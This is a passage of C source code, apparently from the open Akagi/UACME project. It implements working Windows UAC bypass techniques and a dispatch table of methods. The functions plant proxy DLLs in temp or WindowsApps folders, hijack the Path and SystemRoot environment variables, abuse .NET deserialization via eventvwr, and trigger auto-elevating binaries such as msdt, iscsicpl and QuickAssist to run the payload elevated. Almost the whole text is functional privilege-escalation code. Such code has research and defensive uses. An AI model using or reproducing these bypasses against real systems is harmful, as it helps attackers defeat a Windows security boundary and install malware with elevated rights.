Vanhoutte.\n*\n*/\nNTSTATUS ucmJunctionMethod(\n    _In_ PVOID ProxyDll,\n    _In_ DWORD ProxyDllSize\n)\n{\n    NTSTATUS MethodResult = STATUS_ACCESS_DENIED;\n\n    DWORD i, cNames;\n\n    LPWSTR lpEnd;\n\n    WCHAR szBuffer[MAX_PATH * 2];\n\n    //\n    // Drop payload dll to %temp% and make cab for it.\n    //\n    cNames = (g_ctx->dwBuildNumber < NT_WIN10_20H1) ? 1 : DISM_DLL_NAMES;\n\n    for (i = 0; i < cNames; i++) {\n\n        RtlSecureZeroMemory(szBuffer, sizeof(szBuffer));\n        _strcpy(szBuffer, g_ctx->szTempDirectory);\n        _strcat(szBuffer, g_DismTargets[i]);\n\n        if (ucmCreateCabinetForSingleFile(szBuffer, ProxyDll, ProxyDllSize, NULL)) {\n\n            _strcpy(szBuffer, g_ctx->szSystemDirectory);\n\n            lpEnd = _strend(szBuffer);\n            if (*(lpEnd - 1) == TEXT('\\\\'))\n                *(lpEnd - 1) = TEXT('\\0');\n\n            if (ucmWusaExtractViaJunction(szBuffer)) {\n\n                //\n                // Run target.\n                //\n                MethodResult = ucmxDisemer();\n\n            }\n\n            ucmWusaCabinetCleanup();\n        }\n\n    }\n\n#ifdef _DEBUG\n    supSetGlobalCompletionEvent();\n#endif\n\n    return MethodResult;\n}\n\n/*\n* ucmMsdtMethod\n*\n* Purpose:\n*\n* Bypass UAC by dll hijack of sdiagnhost.\n* https://blog.sevagas.com/?MSDT-DLL-Hijack-UAC-bypass\n*\n*/\nNTSTATUS ucmMsdtMethod(\n    _In_ PVOID ProxyDll,\n    _In_ DWORD ProxyDllSize\n)\n{\n    BOOLEAN bCleanupNeeded = FALSE;\n    UINT i;\n    NTSTATUS MethodResult = STATUS_ACCESS_DENIED;\n#ifndef _WIN64\n    NTSTATUS ntStatus = STATUS_ACCESS_DENIED;\n#endif\n    WCHAR szPath[MAX_PATH * 2];\n    WCHAR szApp[MAX_PATH + 1];\n    WCHAR szParams[MAX_PATH * 2];\n\n#ifndef _WIN64\n    if (g_ctx->IsWow64) {\n        ntStatus = supEnableDisableWow64Redirection(TRUE);\n        if (!NT_SUCCESS(ntStatus))\n            return ntStatus;\n    }\n#endif\n\n    do {\n\n        RtlSecureZeroMemory(&szPath, sizeof(szPath));\n        if 
(!SHGetSpecialFolderPath(NULL, (LPWSTR)&szPath, CSIDL_LOCAL_APPDATA, FALSE))\n            break;\n\n        supConcatenatePaths(szPath, TEXT(\"Microsoft\\\\WindowsApps\"), MAX_PATH);\n        supConcatenatePaths(szPath, BLUETOOTHDIAGNOSTICUTIL_DLL, MAX_PATH);\n\n        if (!supWriteBufferToFile(szPath, ProxyDll, ProxyDllSize))\n            break;\n\n        bCleanupNeeded = TRUE;\n\n        _strcpy(szApp, g_ctx->szSystemRoot);\n        supConcatenatePaths(szApp, SYSWOW64_DIR, MAX_PATH);\n        supConcatenatePaths(szApp, MSDT_EXE, MAX_PATH);\n\n        _strcpy(szParams, TEXT(\"-path \"));\n        _strcat(szParams, g_ctx->szSystemRoot);\n        _strcat(szParams, TEXT(\"diagnostics\\\\index\\\\BluetoothDiagnostic.xml -skip yes\"));\n\n        if (supRunProcess2(szApp,\n            szParams,\n            NULL,\n            SW_HIDE,\n            10000))\n        {\n            MethodResult = STATUS_SUCCESS;\n        }\n\n    } while (FALSE);\n\n\n    if (bCleanupNeeded) {\n        i = 5;\n        do {\n\n            if (DeleteFile(szPath))\n                break;\n\n            Sleep(1000);\n            i--;\n        } while (i);\n\n    }\n\n\n#ifndef _WIN64\n    if (g_ctx->IsWow64) {\n        supEnableDisableWow64Redirection(FALSE);\n    }\n#endif\n\n#ifdef _DEBUG\n    supSetGlobalCompletionEvent();\n#endif\n\n    return MethodResult;\n}\n\n/*\n* ucmDotNetSerialMethod\n*\n* Purpose:\n*\n* Bypass UAC using DotNet Deserialization for eventvwr.\n*\n*/\nNTSTATUS ucmDotNetSerialMethod(\n    _In_ LPWSTR lpszPayload\n)\n{\n    NTSTATUS MethodResult = STATUS_ACCESS_DENIED;\n    HANDLE hProcess = NULL;\n    PVOID dataBuffer;\n    DWORD dataSize;\n    LPWSTR lpAppData = NULL, lpTargetPath = NULL;\n    SIZE_T memIO;\n    WCHAR szTarget[MAX_PATH * 2];\n\n    do {\n\n        //\n        // Set payload as environment variable.\n        //\n        supSetEnvVariable(FALSE, NULL, MYSTERIOUSCUTETHING, lpszPayload);\n\n        //\n        // Drop RecentViews cache element to 
%AppData%.\n        //\n        if (FAILED(SHGetKnownFolderPath(&FOLDERID_LocalAppData, 0, NULL, &lpAppData)))\n            break;\n\n        memIO = (MAX_PATH + _strlen(lpAppData)) * sizeof(WCHAR);\n        lpTargetPath = (LPWSTR)supHeapAlloc(memIO);\n        if (lpTargetPath == NULL)\n            break;\n\n        _strcpy(lpTargetPath, lpAppData);\n        _strcat(lpTargetPath, TEXT(\"\\\\Microsoft\\\\Event Viewer\\\\RecentViews\"));\n\n        if (g_ctx->dwBuildNumber < NT_WIN8_RTM) {\n            dataBuffer = (PVOID)g_encodedRecentViewsV2;\n            dataSize = sizeof(g_encodedRecentViewsV2);\n        }\n        else {\n            dataBuffer = (PVOID)g_encodedRecentViews;\n            dataSize = sizeof(g_encodedRecentViews);\n        }\n\n        if (!supDecodeAndWriteBufferToFile(lpTargetPath,\n            (CONST PVOID)dataBuffer,\n            dataSize,\n            'zzzz'))\n        {\n            break;\n        }\n\n        //\n        // Run eventvwr.exe as final trigger.\n        //\n        _strcpy(szTarget, g_ctx->szSystemDirectory);\n        _strcat(szTarget, MMC_EXE);\n        hProcess = supRunProcess3(szTarget, EVENTVWR_MSC, NULL, SW_SHOW);\n        if (hProcess) {\n            supWaitForChildProcesses(MMC_EXE, 50 * 1000);\n            CloseHandle(hProcess);\n            MethodResult = STATUS_SUCCESS;\n        }\n\n    } while (FALSE);\n\n    CoTaskMemFree(lpAppData);\n    if (lpTargetPath) {\n        DeleteFile(lpTargetPath);\n        supHeapFree(lpTargetPath);\n    }\n\n    supSetEnvVariable(TRUE, NULL, MYSTERIOUSCUTETHING, NULL);\n\n    return MethodResult;\n}\n\n/*\n* ucmIscsiCplMethodCleanup\n*\n* Purpose:\n*\n* Post execution cleanup routine.\n*\n*/\nVOID ucmIscsiCplMethodCleanup(\n    VOID\n)\n{\n    WCHAR szBuffer[MAX_PATH * 2];\n\n    _strcpy(szBuffer, g_ctx->szTempDirectory);\n    _strcat(szBuffer, ISCSIEXE_DLL);\n    DeleteFile(szBuffer);\n}\n\n/*\n* ucmIscsiCplMethod\n*\n* Purpose:\n*\n* Bypass UAC by dll hijack of iscsicpl.\n* 
https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC\n*\n*/\nNTSTATUS ucmIscsiCplMethod(\n    _In_ PVOID ProxyDll,\n    _In_ DWORD ProxyDllSize\n)\n{\n    BOOL bValueSet = FALSE;\n    NTSTATUS MethodResult = STATUS_ACCESS_DENIED;\n    SIZE_T nLen;\n    WCHAR* pszOldEnvValue = NULL;\n    WCHAR szBuffer[MAX_PATH * 2];\n\n\n#ifndef _WIN64\n    if (g_ctx->IsWow64) {\n        MethodResult = supEnableDisableWow64Redirection(TRUE);\n        if (!NT_SUCCESS(MethodResult))\n            return MethodResult;\n    }\n#endif\n\n    do {\n\n        _strcpy(szBuffer, g_ctx->szTempDirectory);\n        nLen = _strlen(szBuffer);\n        if (szBuffer[nLen - 1] == L'\\\\') {\n            szBuffer[nLen - 1] = 0;\n        }\n\n        bValueSet = supReplaceEnvironmentVariableValue(NULL,\n            TEXT(\"Path\"),\n            REG_EXPAND_SZ,\n            szBuffer,\n            (PVOID*)&pszOldEnvValue);\n\n        if (!bValueSet)\n            break;\n\n        _strcpy(szBuffer, g_ctx->szTempDirectory);\n        _strcat(szBuffer, ISCSIEXE_DLL);\n        if (!supWriteBufferToFile(szBuffer, ProxyDll, ProxyDllSize))\n            break;\n\n        _strcpy(szBuffer, USER_SHARED_DATA->NtSystemRoot);\n        _strcat(szBuffer, SYSWOW64_DIR);\n        _strcat(szBuffer, ISCSICPL_EXE);\n        if (supRunProcess2(szBuffer, NULL, NULL, SW_HIDE, 5000))\n            MethodResult = STATUS_SUCCESS;\n\n    } while (FALSE);\n\n    if (pszOldEnvValue) {\n\n        supReplaceEnvironmentVariableValue(NULL,\n            TEXT(\"Path\"),\n            REG_EXPAND_SZ,\n            pszOldEnvValue,\n            NULL);\n\n        supHeapFree(pszOldEnvValue);\n    }\n    else {\n        supRegCurrentUserDeleteSubKeyValue(TEXT(\"Environment\"), TEXT(\"Path\"));\n    }\n\n#ifndef _WIN64\n    if (g_ctx->IsWow64) {\n        supEnableDisableWow64Redirection(FALSE);\n    }\n#endif\n\n#ifdef _DEBUG\n    supSetGlobalCompletionEvent();\n#endif\n\n    return MethodResult;\n}\n\n/*\n* ucmRequestTraceMethod\n*\n* 
Purpose:\n*\n* Bypass UAC by environment variables hijack and dll planting.\n* https://github.com/R41N3RZUF477/RequestTrace_UAC_Bypass\n*\n*/\nNTSTATUS ucmRequestTraceMethod(\n    _In_ PVOID ProxyDll,\n    _In_ DWORD ProxyDllSize\n)\n{\n    BOOL fDirCreated = FALSE, fEnvSet = FALSE;\n    NTSTATUS MethodResult = STATUS_ACCESS_DENIED;\n    SIZE_T PayloadDirNameLen = 0, nLen;\n    WCHAR szBuffer[MAX_PATH + 1];\n    WCHAR szPayloadDir[MAX_PATH * 2];\n\n    UNICODE_STRING uStrTaskhost = RTL_CONSTANT_STRING(TASKHOSTW_EXE);\n\n    INPUT inputs[8];\n\n    do {\n        //\n        // Create destination dir \"system32\" in %temp%.\n        //\n        _strcpy(szPayloadDir, g_ctx->szTempDirectory);\n        _strcat(szPayloadDir, SYSTEM32_DIR_NAME);\n        PayloadDirNameLen = _strlen(szPayloadDir);\n        if (!CreateDirectory(szPayloadDir, NULL)) {\n            if (GetLastError() != ERROR_ALREADY_EXISTS)\n                break;\n        }\n\n        fDirCreated = TRUE;\n\n        _strcat(szPayloadDir, TEXT(\"\\\\\"));\n        _strcat(szPayloadDir, PERFORMANCETRACEHANDLER_DLL);\n        if (!supWriteBufferToFile(szPayloadDir, ProxyDll, ProxyDllSize))\n            break;\n\n        //\n        // Set new %SystemRoot% environment variable.\n        //\n        _strcpy(szBuffer, g_ctx->szTempDirectory);\n\n        nLen = _strlen(szBuffer);\n        if (szBuffer[nLen - 1] == L'\\\\') {\n            szBuffer[nLen - 1] = 0;\n        }\n\n        fEnvSet = supSetEnvVariable(FALSE, T_VOLATILE_ENV, T_SYSTEMROOT, szBuffer);\n        if (fEnvSet == FALSE)\n            break;\n\n        supEnumProcessesForSession(NtCurrentPeb()->SessionId,\n            (pfnEnumProcessCallback)supEnumTaskhostTasksCallback, (PVOID)&uStrTaskhost);\n\n        RtlSecureZeroMemory(&inputs[0], sizeof(inputs));\n\n        //\n        // Simulate LSHIFT+LCONTROL+LWIN+T.\n        //\n\n        inputs[0].type = INPUT_KEYBOARD;\n        inputs[0].ki.wVk = VK_LSHIFT;\n\n        inputs[1].type = INPUT_KEYBOARD;\n  
      inputs[1].ki.wVk = VK_LCONTROL;\n\n        inputs[2].type = INPUT_KEYBOARD;\n        inputs[2].ki.wVk = VK_LWIN;\n\n        inputs[3].type = INPUT_KEYBOARD;\n        inputs[3].ki.wVk = 'T';\n\n        inputs[4].type = INPUT_KEYBOARD;\n        inputs[4].ki.wVk = 'T';\n        inputs[4].ki.dwFlags = KEYEVENTF_KEYUP;\n\n        inputs[5].type = INPUT_KEYBOARD;\n        inputs[5].ki.wVk = VK_LWIN;\n        inputs[5].ki.dwFlags = KEYEVENTF_KEYUP;\n\n        inputs[6].type = INPUT_KEYBOARD;\n        inputs[6].ki.wVk = VK_LCONTROL;\n        inputs[6].ki.dwFlags = KEYEVENTF_KEYUP;\n\n        inputs[7].type = INPUT_KEYBOARD;\n        inputs[7].ki.wVk = VK_LSHIFT;\n        inputs[7].ki.dwFlags = KEYEVENTF_KEYUP;\n\n        SendInput(8, &inputs[0], sizeof(INPUT));\n\n        Sleep(5000);\n\n        MethodResult = STATUS_SUCCESS;\n\n    } while (FALSE);\n\n    if (fEnvSet)\n        supSetEnvVariable(TRUE, T_VOLATILE_ENV, T_SYSTEMROOT, NULL);\n\n    if (fDirCreated) {\n        DeleteFile(szPayloadDir);\n        szPayloadDir[PayloadDirNameLen] = 0;\n        RemoveDirectory(szPayloadDir);\n    }\n\n    return MethodResult;\n}\n\n\n/*\n* ucmxModifyWebviewExecutableFolderPolicy\n*\n* Purpose:\n*\n* Alter WebView BrowserExecutableFolder parameter.\n*\n*/\nBOOLEAN ucmxModifyWebviewExecutableFolderPolicy(\n    _In_ LPCWSTR lpPayloadPath\n)\n{\n    BOOLEAN bResult = FALSE;\n    HKEY hKey = NULL;\n\n    if (ERROR_SUCCESS == RegCreateKeyEx(HKEY_CURRENT_USER,\n        T_WEBVIEW_POLICY,\n        0, NULL,\n        REG_OPTION_VOLATILE,\n        MAXIMUM_ALLOWED,\n        NULL,\n        &hKey,\n        NULL))\n    {\n        bResult = (RegSetValueEx(hKey,\n            QUICKASSIST_EXE,\n            0, REG_SZ,\n            (const BYTE*)lpPayloadPath,\n            ((DWORD)_strlen(lpPayloadPath) * sizeof(WCHAR)) + sizeof(UNICODE_NULL)) == ERROR_SUCCESS);\n\n        RegCloseKey(hKey);\n    }\n\n    return bResult;\n}\n\n/*\n* ucmxRunQuickAssist\n*\n* Purpose:\n*\n* Execute quick assist 
through direct exe start or protocol.\n*\n*/\nHANDLE ucmxRunQuickAssist()\n{\n    WCHAR szBuffer[MAX_PATH * 2];\n    SHELLEXECUTEINFO shinfo;\n\n    _strcpy(szBuffer, g_ctx->szSystemDirectory);\n    _strcat(szBuffer, QUICKASSIST_EXE);\n\n    RtlSecureZeroMemory(&shinfo, sizeof(shinfo));\n    shinfo.cbSize = sizeof(shinfo);\n    shinfo.fMask = SEE_MASK_NOCLOSEPROCESS;\n    shinfo.lpVerb = NULL;\n    shinfo.lpParameters = NULL;\n    shinfo.nShow = SW_MINIMIZE;\n\n    if (GetFileAttributes(szBuffer) != INVALID_FILE_ATTRIBUTES) {\n        shinfo.lpFile = szBuffer;\n    }\n    else {\n        shinfo.lpFile = T_QUICKASSIST;\n    }\n\n    if (ShellExecuteEx(&shinfo)) {\n        return shinfo.hProcess;\n    }\n\n    return NULL;\n}\n\n/*\n* ucmQuickAssistMethod\n*\n* Purpose:\n*\n* Bypass UAC by environment variables hijack and dll planting.\n* https://github.com/R41N3RZUF477/QuickAssist_UAC_Bypass\n*\n*/\nNTSTATUS ucmQuickAssistMethod(\n    _In_ PVOID ProxyDll,\n    _In_ DWORD ProxyDllSize\n)\n{\n    BOOL fDirCreated = FALSE, fEnvSet = FALSE;\n    HANDLE hProcess;\n    NTSTATUS MethodResult = STATUS_ACCESS_DENIED;\n    WCHAR szPayloadPath[MAX_PATH * 2];\n    WCHAR szPayloadFile[MAX_PATH * 2];\n\n    do {\n\n        //\n        // Select payload entry point.\n        //\n        if (!supReplaceDllEntryPoint(\n            ProxyDll,\n            ProxyDllSize,\n            FUBUKI_ENTRYPOINT_QASSIST,\n            FALSE))\n        {\n            break;\n        }\n\n        //\n        // Create destination dir \"EBWebView\\x64\" in %temp%.\n        //\n        _strcpy(szPayloadPath, g_ctx->szTempDirectory);\n        _strcat(szPayloadPath, WEBVIEW_DIR);\n        if (!CreateDirectory(szPayloadPath, NULL)) {\n            if (GetLastError() != ERROR_ALREADY_EXISTS)\n                break;\n        }\n\n        _strcat(szPayloadPath, L\"\\\\x64\");\n        if (!CreateDirectory(szPayloadPath, NULL)) {\n            if (GetLastError() != ERROR_ALREADY_EXISTS)\n                
break;\n        }\n\n        //\n        // Drop payload and alter its version info block.\n        //\n        _strcpy(szPayloadFile, szPayloadPath);\n        _strcat(szPayloadFile, TEXT(\"\\\\\"));\n        _strcat(szPayloadFile, EMBEDDEDBROWSERWEBVIEW_DLL);\n        if (!supWriteBufferToFile(szPayloadFile, ProxyDll, ProxyDllSize))\n            break;\n\n        fDirCreated = TRUE;\n\n        if (!supReplaceVersionInfo(szPayloadFile, (PBYTE)g_webviewvsinfo, sizeof(g_webviewvsinfo), 'qass'))\n            break;\n\n        //\n        // Relay WebView.\n        //\n        if (!ucmxModifyWebviewExecutableFolderPolicy(szPayloadPath)) {\n            fEnvSet = supSetEnvVariable(FALSE, T_VOLATILE_ENV, WEBVIEW2_FOLRDER_VAR, g_ctx->szTempDirectory);\n            if (fEnvSet == FALSE)\n                break;\n        }\n\n        //\n        // Run quick assist.\n        //\n        hProcess = ucmxRunQuickAssist();\n        if (hProcess == NULL)\n            break;\n\n        if (WaitForSingleObject(hProcess, 15000) != WAIT_OBJECT_0) {\n            TerminateProcess(hProcess, 0);\n            CloseHandle(hProcess);\n            break;\n        }\n        CloseHandle(hProcess);\n        MethodResult = STATUS_SUCCESS;\n\n    } while (FALSE);\n\n    supSetGlobalCompletionEvent();\n\n    Sleep(1000);\n\n    if (fEnvSet)\n        supSetEnvVariable(TRUE, T_VOLATILE_ENV, WEBVIEW2_FOLRDER_VAR, NULL);\n\n    if (fDirCreated) {\n        _strcpy(szPayloadPath, g_ctx->szTempDirectory);\n        _strcat(szPayloadPath, WEBVIEW_DIR);\n        supRemoveDirectoryRecursive(szPayloadPath);\n    }\n\n    return MethodResult;\n}\n"
  },
  {
    "path": "Source/Akagi/methods/methods.c",
    "content": "/*******************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2015 - 2025\n*\n*  TITLE:       METHODS.C\n*\n*  VERSION:     3.69\n*\n*  DATE:        07 Jul 2025\n*\n*  UAC bypass dispatch.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#include \"global.h\"\n\nUCM_API(MethodTest);\nUCM_API(MethodSXS);\nUCM_API(MethodDism);\nUCM_API(MethodWow64Logger);\nUCM_API(MethodUiAccess);\nUCM_API(MethodMsSettings);\nUCM_API(MethodTyranid);\nUCM_API(MethodJunction);\nUCM_API(MethodSXSDccw);\nUCM_API(MethodHakril);\nUCM_API(MethodCorProfiler);\nUCM_API(MethodCMLuaUtil);\nUCM_API(MethodDccwCOM);\nUCM_API(MethodDirectoryMock);\nUCM_API(MethodShellSdctl);\nUCM_API(MethodTokenModUIAccess);\nUCM_API(MethodEditionUpgradeManager);\nUCM_API(MethodDebugObject);\nUCM_API(MethodShellChangePk);\nUCM_API(MethodNICPoison);\nUCM_API(MethodDeprecated);\nUCM_API(MethodIeAddOnInstall);\nUCM_API(MethodWscActionProtocol);\nUCM_API(MethodFwCplLua2);\nUCM_API(MethodProtocolHijack);\nUCM_API(MethodPca);\nUCM_API(MethodCurVer);\nUCM_API(MethodMsdt);\nUCM_API(MethodDotNetSerial);\nUCM_API(MethodVFServerTaskSched);\nUCM_API(MethodVFServerDiagProf);\nUCM_API(MethodIscsiCpl);\nUCM_API(MethodAtlHijack);\nUCM_API(MethodSspiDatagram);\nUCM_API(MethodRequestTrace);\nUCM_API(MethodQuickAssist);\n\nULONG UCM_WIN32_NOT_IMPLEMENTED[] = {\n    UacMethodWow64Logger,\n    UacMethodEditionUpgradeMgr,\n    UacMethodNICPoison,\n    UacMethodIeAddOnInstall,\n    UacMethodWscActionProtocol,\n    UacMethodFwCplLua2,\n    UacMethodMsSettingsProtocol,\n    UacMethodMsStoreProtocol,\n    UacMethodPca,\n    UacMethodCurVer,\n    UacMethodVFServerTaskSched,\n    UacMethodVFServerDiagProf,\n    
UacMethodAtlHijack,\n    UacMethodSspiDatagram,\n    UacMethodRequestTrace,\n    UacMethodQuickAssist\n};\n\nUCM_API_DISPATCH_ENTRY ucmMethodsDispatchTable[UCM_DISPATCH_ENTRY_MAX] = {\n    { MethodTest, { NT_WIN7_RTM, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },\n    { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },\n    { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },\n    { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },\n    { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },\n    { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },\n    { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },\n    { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },\n    { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },\n    { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },\n    { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },\n    { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },\n    { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },\n    { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },\n    { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },\n    { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },\n    { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },\n    { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },\n    { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },\n    { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, 
FALSE, FALSE },\n    { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },\n    { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },\n    { MethodSXS, { NT_WIN7_RTM, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },\n    { MethodDism, { NT_WIN7_RTM, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },\n    { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },\n    { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },\n    { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },\n    { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },\n    { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },\n    { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },\n    { MethodWow64Logger, { NT_WIN7_RTM, MAXDWORD }, AKATSUKI_ID, FALSE, TRUE, TRUE },\n    { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },\n    { MethodUiAccess, { NT_WIN7_RTM, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },\n    { MethodMsSettings, { NT_WIN10_THRESHOLD1, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },\n    { MethodTyranid, { NT_WIN8_BLUE, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },\n    { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },\n    { MethodJunction, { NT_WIN7_RTM, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },\n    { MethodSXSDccw, { NT_WIN7_RTM, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },\n    { MethodHakril, { NT_WIN7_RTM, MAXDWORD }, FUBUKI_ID, FALSE, FALSE, TRUE },\n    { MethodCorProfiler, { NT_WIN7_RTM, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },\n    { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },\n    { MethodCMLuaUtil, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, TRUE, FALSE },\n    { MethodDeprecated, { 
NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },\n    { MethodDccwCOM, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, TRUE, TRUE },\n    { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },\n    { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },\n    { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },\n    { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },\n    { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },\n    { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },\n    { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },\n    { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },\n    { MethodDirectoryMock, { NT_WIN7_RTM, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },\n    { MethodShellSdctl, { NT_WIN10_REDSTONE1, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },\n    { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },\n    { MethodTokenModUIAccess, { NT_WIN7_RTM, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, FALSE },\n    { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },\n    { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },\n    { MethodEditionUpgradeManager, { NT_WIN10_REDSTONE1, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },\n    { MethodDebugObject, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },\n    { MethodDeprecated, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },\n    { MethodShellChangePk, { NT_WIN10_REDSTONE1, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },\n    { MethodMsSettings, { NT_WIN10_REDSTONE4, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },\n    { MethodNICPoison, { NT_WIN7_RTM, MAXDWORD }, FUBUKI_ID, FALSE, 
TRUE, TRUE },\n    { MethodIeAddOnInstall, { NT_WIN7_RTM, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },\n    { MethodWscActionProtocol, { NT_WIN7_RTM, NT_WIN11_24H2 }, PAYLOAD_ID_NONE, FALSE, TRUE, FALSE },\n    { MethodFwCplLua2, { NT_WIN7_RTM, NT_WIN11_24H2 }, PAYLOAD_ID_NONE, FALSE, TRUE, FALSE },\n    { MethodProtocolHijack, { NT_WIN10_THRESHOLD1, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, TRUE, FALSE },\n    { MethodProtocolHijack, { NT_WIN10_REDSTONE5, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, TRUE, FALSE },\n    { MethodPca, { NT_WIN7_RTM, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },\n    { MethodCurVer, { NT_WIN10_THRESHOLD1, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, FALSE, FALSE },\n    { MethodNICPoison, { NT_WIN7_RTM, MAXDWORD }, FUBUKI_ID, FALSE, TRUE, TRUE },\n    { MethodMsdt, { NT_WIN10_THRESHOLD1, MAXDWORD }, FUBUKI32_ID, FALSE, FALSE, TRUE },\n    { MethodDotNetSerial, { NT_WIN7_RTM, MAXDWORD }, PAYLOAD_ID_NONE, FALSE, TRUE, FALSE },\n    { MethodVFServerTaskSched, { NT_WIN8_BLUE, MAXDWORD}, AKATSUKI_ID, FALSE, TRUE, TRUE },\n    { MethodVFServerDiagProf, { 